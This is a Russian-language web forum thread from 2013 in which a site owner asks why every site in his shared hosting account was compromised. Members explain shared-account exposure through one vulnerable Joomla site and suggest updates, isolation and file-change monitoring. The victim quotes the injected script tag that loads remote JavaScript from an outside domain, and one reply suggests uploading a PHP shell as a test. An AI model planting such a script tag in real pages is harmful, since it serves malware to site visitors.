Модераторы: Wowa
  

Поиск:

Ответ в темуСоздание новой темы Создание опроса
> Взлом всех сайтов в аккаунте, Как у меня взломали все сайты в акаунте? 
V
    Опции темы
Alexblbl
  Дата 10.10.2013, 11:35 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Новичок



Профиль
Группа: Участник
Сообщений: 32
Регистрация: 16.3.2011

Репутация: нет
Всего: нет



Добрый день!

Такая ситуация, хостюсь на FREEHOST, всё было хорошо, были конечно иногда траблы, но не такие как сейчас.
В общем одним утром обнаруживаю, что все мои файлы в которых есть <head> заменены на <script language="JavaScript" src="http://stummann.net/steffen/google-analytics/jquery-1.6.5.min.js" type="text/javascript"></script></head>
то есть кто-то как-то получил доступ ко всем файлам из моего аккаунта и произвёл там замену. Подскажите пожалуйста как такое могло произойти ?

Очень нужна ваша помощь, т.к. починить как бы я могу, но если такое повторится что мне делать ? Я думаю это проблема хостинга а не моих сайтов, и наверное надо доводить дело до суда, что скажете ?

Вот текст переписки с службой поддержки:

Я:
Добрый день поддержка,
Пишу вам, потому что все мои сайты в моём аккаунте были взломаны. И мне нужен лог ФТП доступа за последний месяц.

Мне нужно знать причину поломки, т.к. сделать уязвимость на всех сайтах просто невозможно.
Не могли бы вы предоставить мне лог ФТП доступа за последний месяц, а лучше два?

У вас на сайте я пробовал посмотреть лог, но он даётся только на неделю, может чуть больше.

Поддержка:
Здравствуйте.
Благодарим за ваше обращение.

К сожалению, log храним только за две недели, он должен быть доступен Вам с панели управления.

Я:
Хорошо, тогда предоставьте мне какой-то отчет, по которому я могу понять как так получилось, что все мои сайты в одном аккаунте были взломаны, то есть были добавлены строчки стороннего кода. Были добавленные строчки стороннего кода даже туда, где есть просто файл index.html, .htaccess, logo.png, и гугл аналитик файл с одной строчкой текста. На всех файлах стояли права 644.

Ожидаю ваш ответ.

Поддержка:
Здравствуйте.
Благодарим за ваше обращение.

Взлом сайтов может быть не обязательно по ФТП, более вероятный вариант это взлом по HTTP. Если есть уязвимость в одном сайте, значит доступ есть к файлам всего аккаунтах, потому что пользователь у сайтов хостинг-аккаунта один. Вы можете проанализировать логи HTTP, они так же доступны в панели управления.

Других логов мы не предоставляем.

Я:
По логам HTTP ничего подозрительного нет, кроме обращения к несуществующим файлам.
Как у вас может происходить взлом по HTTP, объясните пожалуйста. Что необходимо что бы был доступ к моим файлам ?

жду ответ ...
PM MAIL   Вверх
Сумасшедший
Дата 10.10.2013, 11:53 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Чилавек-Каропка
***


Профиль
Группа: Завсегдатай
Сообщений: 1503
Регистрация: 15.8.2004
Где: Москва

Репутация: 3
Всего: 107



Смею Вас поздравить с новым открытием: во взломе Ваших сайтов могут быть (и с наибольшей вероятностью) виноваты не хостеры, а технологические отверстия в безопасности.
Хостер предоставил Вам всю информацию, которую мог, без ковыряния в Ваших дырявых носкахскриптах. Лучше отправьте логи разработчикам Ваших скриптов и спросите их, как они написали такое гоие скрипты. Ну, или если Вы пользуете готовые движки, посмотрите, давно ли Вы их обновляли. И, пожалуй, попросите их посмотреть бэкапы - если поломали недавно, то стоит восстановить их бэкап и сделать себе его резервную копию.


--------------------
Однажды ты спросишь, а я отвечу: "Время ожидания специалиста - 10 минут". Ты бросишь трубку, так и не узнав, что Ваш звонок очень важен для нас!
PM MAIL WWW Jabber   Вверх
Alexblbl
Дата 10.10.2013, 12:00 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Новичок



Профиль
Группа: Участник
Сообщений: 32
Регистрация: 16.3.2011

Репутация: нет
Всего: нет



Цитата(Сумасшедший @ 10.10.2013,  11:53)
Смею Вас поздравить с новым открытием: во взломе Ваших сайтов могут быть (и с наибольшей вероятностью) виноваты не хостеры, а технологические отверстия в безопасности.
Хостер предоставил Вам всю информацию, которую мог, без ковыряния в Ваших дырявых носкахскриптах. Лучше отправьте логи разработчикам Ваших скриптов и спросите их, как они написали такое гоие скрипты. Ну, или если Вы пользуете готовые движки, посмотрите, давно ли Вы их обновляли. И, пожалуй, попросите их посмотреть бэкапы - если поломали недавно, то стоит восстановить их бэкап и сделать себе его резервную копию.

Я конечно не великий разработчик, но все те сайты (почти) делал я. Я не спорю что большинство написано как ###.
Да я использую Joomla, в некоторых местах есть Joomla 1.5.

То есть выходит, что с помощью одного дырявого скрипта они смогли получить доступ ко всем файлам в аккаунте, так ?
Как обойти это после того как я всё почищу ?

Это сообщение отредактировал(а) Alexblbl - 10.10.2013, 12:01
PM MAIL   Вверх
Ontovendor
Дата 10.10.2013, 14:00 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Новичок



Профиль
Группа: Участник
Сообщений: 16
Регистрация: 4.2.2013

Репутация: нет
Всего: нет



Цитата(Alexblbl @  10.10.2013,  12:00 Найти цитируемый пост)
То есть выходит, что с помощью одного дырявого скрипта они смогли получить доступ ко всем файлам в аккаунте, так ?

Судя по переписке саппорт вам ни чего не ответил, разбирайтесь сами. Сломать могли и по ФТП и просто хостера ломануть, вместе с вами масса сайтов была бы сломана на других акках. ТО что меняли одну строчку и заливали один и тот же по составу файл  - говорит об автоматической обработке, значит на движку им было фиолетово. Почитайте по инету, по форумам и у хостера на форуме (если есть) за последнее время какие к нему были претензии от других хостящихся.
Цитата(Alexblbl @  10.10.2013,  12:00 Найти цитируемый пост)
Как обойти это после того как я всё почищу ?

Всегда обновлять движки и соблюдать рекомендации разработчиков.

PS^ Но я сам держу там несколько сайтов, с ними все гуд и хостер вроде адекватный.

Это сообщение отредактировал(а) Ontovendor - 10.10.2013, 14:02
PM MAIL   Вверх
Alexblbl
  Дата 10.10.2013, 15:00 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Новичок



Профиль
Группа: Участник
Сообщений: 32
Регистрация: 16.3.2011

Репутация: нет
Всего: нет



Цитата(Ontovendor @ 10.10.2013,  14:00)
Цитата(Alexblbl @  10.10.2013,  12:00 Найти цитируемый пост)
То есть выходит, что с помощью одного дырявого скрипта они смогли получить доступ ко всем файлам в аккаунте, так ?

Судя по переписке саппорт вам ни чего не ответил, разбирайтесь сами. Сломать могли и по ФТП и просто хостера ломануть, вместе с вами масса сайтов была бы сломана на других акках. ТО что меняли одну строчку и заливали один и тот же по составу файл  - говорит об автоматической обработке, значит на движку им было фиолетово. Почитайте по инету, по форумам и у хостера на форуме (если есть) за последнее время какие к нему были претензии от других хостящихся.
Цитата(Alexblbl @  10.10.2013,  12:00 Найти цитируемый пост)
Как обойти это после того как я всё почищу ?

Всегда обновлять движки и соблюдать рекомендации разработчиков.

PS^ Но я сам держу там несколько сайтов, с ними все гуд и хостер вроде адекватный.

Большое спасибо!
PM MAIL   Вверх
Сумасшедший
Дата 11.10.2013, 10:39 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Чилавек-Каропка
***


Профиль
Группа: Завсегдатай
Сообщений: 1503
Регистрация: 15.8.2004
Где: Москва

Репутация: 3
Всего: 107



Цитата(Alexblbl @  10.10.2013,  12:00 Найти цитируемый пост)
То есть выходит, что с помощью одного дырявого скрипта они смогли получить доступ ко всем файлам в аккаунте, так ?

Именно так - как правило один клиент - один пользователь на сервере. Т.е. запустив небезопасный скрипт на к/л из Ваших сайтов, можно получить доступ ко всем файлам Вашего пользователя. Т.е. - ко всем Вашим сайтам.
Для примера - залейте на хостинг какой-нибудь php shell или что-либо подобное - посмотрите в консоли что из одного сайта - получаете доступ к дргим без каких-либо проблем.
Цитата(Alexblbl @  10.10.2013,  12:00 Найти цитируемый пост)
Как обойти это после того как я всё почищу ?

Проверять безопасность. Если не соответствует - выносить небезопасные сайты на отдельный аккаунт и там с ними мучаться.
Можно сделать синхронизацию - по rsync или svn и периодическую проверку по cron изменившихся файлов. Но тут есть один минус - файлы-то отслеживать проще простого, а с базами уже так не выйдет.


--------------------
Однажды ты спросишь, а я отвечу: "Время ожидания специалиста - 10 минут". Ты бросишь трубку, так и не узнав, что Ваш звонок очень важен для нас!
PM MAIL WWW Jabber   Вверх
Alexblbl
Дата 12.10.2013, 01:29 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Новичок



Профиль
Группа: Участник
Сообщений: 32
Регистрация: 16.3.2011

Репутация: нет
Всего: нет



Цитата(Сумасшедший @ 11.10.2013,  10:39)
Цитата(Alexblbl @  10.10.2013,  12:00 Найти цитируемый пост)
То есть выходит, что с помощью одного дырявого скрипта они смогли получить доступ ко всем файлам в аккаунте, так ?

Именно так - как правило один клиент - один пользователь на сервере. Т.е. запустив небезопасный скрипт на к/л из Ваших сайтов, можно получить доступ ко всем файлам Вашего пользователя. Т.е. - ко всем Вашим сайтам.
Для примера - залейте на хостинг какой-нибудь php shell или что-либо подобное - посмотрите в консоли что из одного сайта - получаете доступ к дргим без каких-либо проблем.
Цитата(Alexblbl @  10.10.2013,  12:00 Найти цитируемый пост)
Как обойти это после того как я всё почищу ?

Проверять безопасность. Если не соответствует - выносить небезопасные сайты на отдельный аккаунт и там с ними мучаться.
Можно сделать синхронизацию - по rsync или svn и периодическую проверку по cron изменившихся файлов. Но тут есть один минус - файлы-то отслеживать проще простого, а с базами уже так не выйдет.

А базы как замешаны ?
Получается в базу тоже получаешь доступ ?
Есть ссылкочка как сделать синхронизацию ? WebStorm не поможет ?
PM MAIL   Вверх
Сумасшедший
Дата 14.10.2013, 21:03 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Чилавек-Каропка
***


Профиль
Группа: Завсегдатай
Сообщений: 1503
Регистрация: 15.8.2004
Где: Москва

Репутация: 3
Всего: 107



Базы замешаны так, что имея доступ к файловой системе, можно из конфигов получить пароли к ним. И насоздавать/наменять скриптов, которые будут работать с базой. Например сделают дамп и выложат куда-нибудь.
Ссылочки нет - почитайте про svn/git/rssync на выбор. Что есть WebStorm не имею представления, потому не могу ответить.


--------------------
Однажды ты спросишь, а я отвечу: "Время ожидания специалиста - 10 минут". Ты бросишь трубку, так и не узнав, что Ваш звонок очень важен для нас!
PM MAIL WWW Jabber   Вверх
  
Ответ в темуСоздание новой темы Создание опроса
Правила форума "Хостинг"
Wowa
MoLeX

Запрещается!

1. Публиковать ссылки для чисто рекламных целей.

2. Оффтопить, флеймить, говорить не культурно.

Пожалуйста, адекватно задавайте свой вопрос. Тема должна создаваться с названием характеризующем Вашу проблему.

Задавайте вопросы правильно - как спросите, так вам и ответят.

Разрешено!

Делиться ссылками на удачные хостинги по теме.

Обсуждать хостинг по темам.

Давать ссылки на статьи, обзоры, и всего что относится к хостингу и регистрации доменов, если это не нарушает первый пункт правил.

Задавая вопрос, давайте нужную информацию касающуюся Вашей проблемы. Этим вы ускорите полезные ответы.

Внимание!
Все вопросы и запросы по бесплатным хостингам задаются только в этой теме


P.S. Размещение рекламы будет строго наказываться!



Если Вам понравилась атмосфера форума, заходите к нам чаще! С уважением, Wowa, MoLeX

 
1 Пользователей читают эту тему (1 Гостей и 0 Скрытых Пользователей)
0 Пользователей:
« Предыдущая тема | Хостинг и доменные имена | Следующая тема »


 




[ Время генерации скрипта: 0.1207 ]   [ Использовано запросов: 20 ]   [ GZIP включён ]


Реклама на сайте     Информационное спонсорство

 
По вопросам размещения рекламы пишите на vladimir(sobaka)vingrad.ru
Отказ от ответственности     Powered by Invision Power Board(R) 1.3 © 2003  IPS, Inc.